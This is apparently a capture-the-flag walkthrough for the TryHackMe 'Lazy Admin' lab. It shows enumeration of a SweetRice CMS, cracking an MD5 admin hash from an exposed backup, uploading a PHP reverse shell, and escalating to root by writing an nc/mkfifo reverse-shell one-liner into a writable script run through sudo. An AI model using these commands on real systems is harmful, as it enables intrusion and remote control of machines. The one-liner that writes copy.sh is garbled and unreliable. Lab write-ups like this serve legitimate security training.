Lazy Admin
In this post, we will look into the room “Lazy Admin” from TryHackMe, which can be found on https://tryhackme.com
user flag 1
echo machine-ip lazyadmin.com >> /etc/hosts
Enumeration
nmap -sC -sV -oN nmap.txt lazyadmin.com
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-16 04:08 EDT
Nmap scan report for lazyadmin.com (10.10.240.121)
Host is up (0.26s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
| 256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_ 256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.82 seconds
firefox lazyadmin.com
We will run gobuster to enumerate the website
gobuster dir -u http://lazyadmin.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 35
/content
firefox lazyadmin.com/content
Welcome to SweetRice - Thank your for install SweetRice as your website management system.
This site is building now , please come late.
If you are the webmaster,please go to Dashboard -> General -> Website setting
and uncheck the checkbox "Site close" to open your website.
More help at Tip for Basic CMS SweetRice installed
gobuster dir -u http://lazyadmin.com/content -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 35
/inc
firefox lazyadmin.com/content/inc
we will see a folder named mysql_backup navigate to mysql_backup and download the file open the file using any text editor i use vim
14 => 'INSERT INTO `%--%_options` VALUES(\'1\',\'global_setting\',\'a:17:{s:4:\\"name\\";s:25:\\"Lazy Admin's Website\\";s:6:\\"author\\";s:10:\\"Lazy Admin\\";s:5:\\"title\\";s:0:\\"\\";s:8:\\"keywords\\";s:8:\\"Keywords\\";s:11:\\"description\\";s:11:\\
"Description\\";s:5:\\"admin\\";s:7:\\"manager\\";s:6:\\"passwd\\";s:32:\\"42f749ade7f9e195bf475f37a44cafcb\\";s:5:
\\"close\\";i:1;s:9:\\"close_tip\\";s:454:\\"
<p>Welcome to SweetRice - Thank your for install SweetRice as your website management system.</p>
manager : 42f749ade7f9e195bf475f37a44cafcb(MD5)
echo 42f749ade7f9e195bf475f37a44cafcb > hash.txt john --format=RAW-MD5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
manager : Password123
firefox lazyadmin.com/content/as
and enter the creds to login and navigate to media center and upload the reverse shell if you dont have you can download it from the link below https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php after changing the ip address and renaming it to revshell.php5 we see the file is uploaded open terminal and execute this
nc -lnvp 4444
now click on the uploaded file and we got a shell
python -c 'import pty; pty.spawn("/bin/bash")'enter these two commands to spawn a tty terminal move to /home/itguy
we got the user flag
root flag
Privilege Escalation
rice : randompass
#!/usr/bin/perl
system("sh", "/etc/copy.sh");this script executes another script /etc/copy.sh
cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f
Luckily we can write into copy.sh now all we need to do is insert a reverse shell
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <your-ip> 5554" >/tmp/f > copy.sh
open a new terminal and run this command
nc -lnvp 5554
then go victim shell and execute this command
sudo /usr/bin/perl /home/itguy/backup.pl